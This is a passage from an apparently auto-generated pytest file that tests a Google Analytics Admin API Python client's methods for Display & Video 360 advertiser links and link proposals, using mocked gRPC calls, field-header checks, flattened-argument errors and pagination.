type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) await client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "display_video_360_advertiser_link.name=display_video_360_advertiser_link.name/value", ) in kw["metadata"] def test_update_display_video360_advertiser_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_display_video360_advertiser_link( display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_display_video360_advertiser_link( analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest(), display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_display_video360_advertiser_link( display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_display_video360_advertiser_link( analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest(), display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_get_display_video360_advertiser_link_proposal( transport: str = "grpc", request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) response = client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" def test_get_display_video360_advertiser_link_proposal_from_dict(): test_get_display_video360_advertiser_link_proposal(request_type=dict) def test_get_display_video360_advertiser_link_proposal_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: client.get_display_video360_advertiser_link_proposal() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() ) @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) ) response = await client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_async_from_dict(): await test_get_display_video360_advertiser_link_proposal_async(request_type=dict) def test_get_display_video360_advertiser_link_proposal_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal() ) await client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_display_video360_advertiser_link_proposal_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_display_video360_advertiser_link_proposal(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_display_video360_advertiser_link_proposal_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_display_video360_advertiser_link_proposal( analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_display_video360_advertiser_link_proposal( name="name_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_display_video360_advertiser_link_proposal( analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest(), name="name_value", ) def test_list_display_video360_advertiser_link_proposals( transport: str = "grpc", request_type=analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( next_page_token="next_page_token_value", ) response = client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListDisplayVideo360AdvertiserLinkProposalsPager) assert response.next_page_token == "next_page_token_value" def test_list_display_video360_advertiser_link_proposals_from_dict(): test_list_display_video360_advertiser_link_proposals(request_type=dict) def test_list_display_video360_advertiser_link_proposals_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: client.list_display_video360_advertiser_link_proposals() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() ) # Establish that the response is the type that we expect. assert isinstance( response, pagers.ListDisplayVideo360AdvertiserLinkProposalsAsyncPager ) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async_from_dict(): await test_list_display_video360_advertiser_link_proposals_async(request_type=dict) def test_list_display_video360_advertiser_link_proposals_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: call.return_value = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) await client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_display_video360_advertiser_link_proposals_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_display_video360_advertiser_link_proposals(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_display_video360_advertiser_link_proposals_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_display_video360_advertiser_link_proposals( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_display_video360_advertiser_link_proposals( parent="parent_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_display_video360_advertiser_link_proposals( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest(), parent="parent_value", ) def test_list_display_video360_advertiser_link_proposals_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_display_video360_advertiser_link_proposals(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLinkProposal) for i in results ) def test_list_display_video360_advertiser_link_proposals_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) pages = list( client.list_display_video360_advertiser_link_proposals(request={}).pages ) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) async_pager = await client.list_display_video360_advertiser_link_proposals( request={}, ) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLinkProposal) for i in responses ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.list_display_video360_advertiser_link_proposals(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_display_video360_advertiser_link_proposal( transport: str = "grpc", request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) response = client.create_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" def test_create_display_video360_advertiser_link_proposal_from_dict(): test_create_display_video360_advertiser_link_proposal(request_type=dict) def test_create_display_video360_advertiser_link_proposal_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: client.create_display_video360_advertiser_link_proposal() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest() ) @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_proposal_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) ) response = await client.create_display_video360_advertiser_link_proposal( request ) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_proposal_async_from_dict(): await test_create_display_video360_advertiser_link_proposal_async(request_type=dict) def test_create_display_video360_advertiser_link_proposal_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() client.create_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_proposal_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal() ) await client.create_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_display_video360_advertiser_link_proposal_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_display_video360_advertiser_link_proposal( parent="parent_value", display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].display_video_360_advertiser_link_proposal == resources.DisplayVideo360AdvertiserLinkProposal( name="name_value" ) def test_create_display_video360_advertiser_link_proposal_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_display_video360_advertiser_link_proposal( analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest(), parent="parent_value", display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal( name="name_value" ), ) @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_proposal_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_display_video360_advertiser_link_proposal( parent="parent_value", display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].display_video_360_advertiser_link_proposal == resources.DisplayVideo360AdvertiserLinkProposal( name="name_value" ) @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_proposal_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): 